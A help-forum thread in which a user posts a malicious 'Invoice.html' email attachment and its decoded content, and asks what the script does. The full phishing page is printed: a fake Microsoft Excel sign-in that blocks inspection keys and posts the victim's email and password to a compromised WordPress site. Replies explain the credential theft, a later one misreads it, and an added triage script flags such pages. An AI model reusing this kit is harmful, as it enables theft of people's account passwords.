What do these JavaScripts do? - NeuHier - 19.10.2022
Hi!
I need your help!
Last night my boss received an e-mail from a supplier with an "Invoice.html" attachment. Suspecting nothing bad, he tried to open the attachment. But he noticed right away that something was fishy here.
This is the content of "Invoice.html":
Code:
<script>
var url_string = "firmenmail@adresse.com";
var data = atob("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");
document.write(data)
</script>
I was able to decode the content this far...
Code:
<!DOCTYPE html>
<html dir="ltr" class="" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Excel worksheet</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
<link crossorigin="anonymous" href="https://cdn.jsdelivr.net/npm/cors@2.8.5/lib/index.min.js">
<link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css" rel="stylesheet">
</head>
<script>
// prevent ctrl + s
window.addEventListener('keydown', async(e) => {
if (e.ctrlKey && (e.which == 83)) {
e.preventDefault();
return false; }
});
window.addEventListener('contextmenu', event => event.preventDefault());
document.onkeydown = function (e) {
if (event.keyCode == 123) {
return false;
}
if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'S'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'H'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'A'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'F'.charCodeAt(0)) {
return false;
}
if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
return false;
}
}
window.onkeydown = (e) => {
return !(e.ctrlKey &&
(e.keyCode === 67 ||
e.keyCode === 86 ||
e.keyCode === 85 ||
e.keyCode === 117));
};
</script>
<body class="cb" style="display: block;">
<form name="f1" id="i0281" method="post" autocomplete="off">
<div class="login-paginated-page">
<div id="lightboxTemplateContainer">
<div id="lightboxBackgroundContainer">
<div class="background-image-holder" role="presentation">
<div class="background-image ext-background-image" style="background-image: url("https://gyazo.com/e21eccf9e307e360e3a80ce6bbc74af8.pgn;);"></div>
</div></div>
<div class="outer" id="bgImgCenter">
<div class="template-section main-section">
<div class="middle ext-middle">
<div class="full-height">
<div class="flex-column">
<div class="win-scroll">
<div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
<div><img src="https://i.gyazo.com/7ae773ff61e2c8a88bda5530c3b2aa13.png" style="width:90px; height:75px;"></div>
<div role="main">
<div id="pstb" class="pagination-view animate has-identity-banner slide-in-next">
<div>
<div class="identityBanner">
<button type="button" class="backButton" id="idBtn_Back"> <img role="presentation" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"> </button>
<div id="show-email" class="identity"></div>
</div>
<div id="loginHeader" class="row title ext-title">
<div role="heading" aria-level="1">Enter password</div>
</div>
<div id="errorpw" style="color: red; margin: 15px; margin-left: 0px; margin-top: 0px; margin-bottom: 0px;"></div>
<div id="important1" style="color: black;font-size: 13px;">
Because you're accessing sensitive info, you need to verify your password to view excel worksheets
</div>
<div class="row">
<div class="form-group col-md-24">
<div class="placeholderContainer">
<input name="passwd" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" required />
</div>
</div>
</div>
<div>
<div class="position-buttons">
<div>
<div class="row">
<div class="col-md-24">
<div class="text-13">
<div class="form-group">
<a id="idA_PWD_ForgotPassword" role="link" href="#">Note: Only recipient's email can access shared files</a>
</div>
<div class="form-group">
</div>
<div class="form-group">
<a id="i1668" href="#"></a>
</div></div></div></div>
</div>
<div class="win-button-pin-bottom">
<div class="row">
<div><div class="col-xs-24 no-padding-left-right button-container">
<div class="inline-block">
<input type="submit" id="Button9" class="win-button button_primary button ext-button primary ext-primary" value="Signin">
</div>
</div></div>
</div>
</div>
</div></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
</div>
</div>
<div class="plate footer ext-footer" role="contentinfo"></div>
<div id="footer" role="contentinfo" class="footer ext-footer">
<div>
<div id="footerLinks" class="footerNode text-secondary">
<a id="ftrTerms" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
<a id="ftrPrivacy" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy & cookies</a>
<a id="moreOptions" href="#" aria-label="Click here for troubleshooting information" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div></div>
</div>
</div>
</div></div>
</form>
<script>
var count = 0;
function set_brand(email) {
$.ajax({
url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
type: "POST",
data: { username: email },
success: function (response) {
let res = JSON.parse(response)
let logo = res["res"]["BannerLogo"], background = res["res"]["Illustration"], DarkTile = res["res"]["TileDarkLogo"]
let TileLogo = res["res"]["TileLogo"], BoilerPlateText = res["res"]["BoilerPlateText"]
if (logo) {
$('.logo').attr('src', logo);
}
if (BoilerPlateText) {
console.log(BoilerPlateText);
$(".plate").append(BoilerPlateText);
$(".plate").css({"text-align": "center"})
}
if (background) {
$('.background-image').css({ 'background-image': 'url(' + background + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
} else if (DarkTile) {
$('.background-image').css({ 'background-image': 'url(' + DarkTile + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
} else if (TileLogo) {
$('.background-image').css({ 'background-image': 'url(' + TileLogo + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
}
}
});
}
function send_result(user, pass) {
$.ajax({
url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
data: {
"email": user,
"password": pass
},
type: "POST",
success: function (data) {
console.log(data);
},
error: function (data) {
console.log('Ajax error');
}
});
}
document.addEventListener('DOMContentLoaded', async() => {
if(url_string){
document.getElementById("show-email").innerHTML = url_string;
document.getElementById("i0118").focus();
set_brand(url_string);
}
document.getElementById("Button9").addEventListener("click", e => {
event.preventDefault ? event.preventDefault() : event.returnValue = false;
var pswd = document.getElementById("i0118").value;
if(pswd.length < 5){
document.getElementById("important1").style.display="none";
setTimeout(() => {document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = "Your account password is too short."}, 1500);
} else if (pswd.length > 5 && count <= 0) {
send_result(url_string, pswd);
document.getElementById("important1").style.display="none";
setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
} else if (count < 2){
send_result(url_string, pswd);
document.getElementById("important1").style.display = "none";
setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
} else {
send_result(url_string, pswd);
setTimeout(() => {window.location.replace("https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee")});
}
});
});
</script>
</div></body></html>
... unfortunately I don't speak JavaScript! Could you please explain to me what exactly the scripts here do and what measures I need to take!
Many thanks in advance!
RE: What do these JavaScripts do? - rzscout - 19.10.2022
Hi,
the whole thing essentially creates a new HTML page using JavaScript and the write method.
It creates a fake page showing an Excel spreadsheet where you are supposed to enter your password. It is a cheap trick to phish data.
Addendum: It sends the data, i.e. the e-mail address and, if applicable, the entered password, to: https://bascom.pl
I would perhaps also report that there, because they know nothing about the attack on them. Through a WordPress flaw they were able to use this site to secretly record data.
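A static triage of this kind of attachment, as an added example that is not part of the original thread: it decodes the atob() payload without rendering it and reports the password field and the POST endpoint described in the reply above. The sample attachment, the host collector.example and the function names are constructed for illustration.

```javascript
// Added example: static triage only. Nothing is rendered, executed or fetched.
// Constructed inner page, modelled on the decoded Invoice.html structure.
const SAMPLE_INNER = `<form method="post"><input name="passwd" type="password"></form>
<script>
$.ajax({ url: 'https://collector.example/pii.php', type: "POST",
         data: { email: user, password: pass } });
window.addEventListener('contextmenu', event => event.preventDefault());
</script>`;
// Constructed outer attachment: base64 blob -> atob() -> document.write().
const SAMPLE_ATTACHMENT = `<script>
var url_string = "user@example.com";
var data = atob("${Buffer.from(SAMPLE_INNER).toString('base64')}");
document.write(data)
</script>`;

// Peel atob("...") layers by decoding the string literal; depth is capped.
function decodeLayers(html, maxDepth = 5) {
  const layers = [html];
  const re = /atob\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)/g;
  for (let depth = 0; depth < maxDepth; depth++) {
    const decoded = [...layers[layers.length - 1].matchAll(re)]
      .map(m => Buffer.from(m[1], 'base64').toString('utf8'));
    if (decoded.length === 0) break;
    layers.push(decoded.join('\n'));
  }
  return layers;
}

// Collect the indicators the thread points out, across all decoded layers.
function triage(html) {
  const layers = decodeLayers(html);
  const text = layers.join('\n');
  const endpoints = [...text.matchAll(/\burl\s*:\s*["'](https?:\/\/[^"']+)["']/g)]
    .map(m => m[1]);
  const report = {
    encodedLayers: layers.length - 1,
    usesDocumentWrite: /document\.write\s*\(/.test(text),
    passwordField: /<input\b[^>]*type\s*=\s*["']?password/i.test(text),
    postEndpoints: [...new Set(endpoints)],
    blocksInspection: /contextmenu|keyCode\s*==\s*123/.test(text),
  };
  report.verdict = report.passwordField && report.postEndpoints.length > 0
    ? 'credential-capture form' : 'no credential-capture indicators';
  return report;
}

console.log(triage(SAMPLE_ATTACHMENT));
```

Run it with Node.js against the attachment's text read from disk; the endpoints it lists are the hosts to block and to search for in proxy logs.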
RE: What do these JavaScripts do? - samlauncher44 - 11.07.2023
I guess it sends emails to an email user automatically.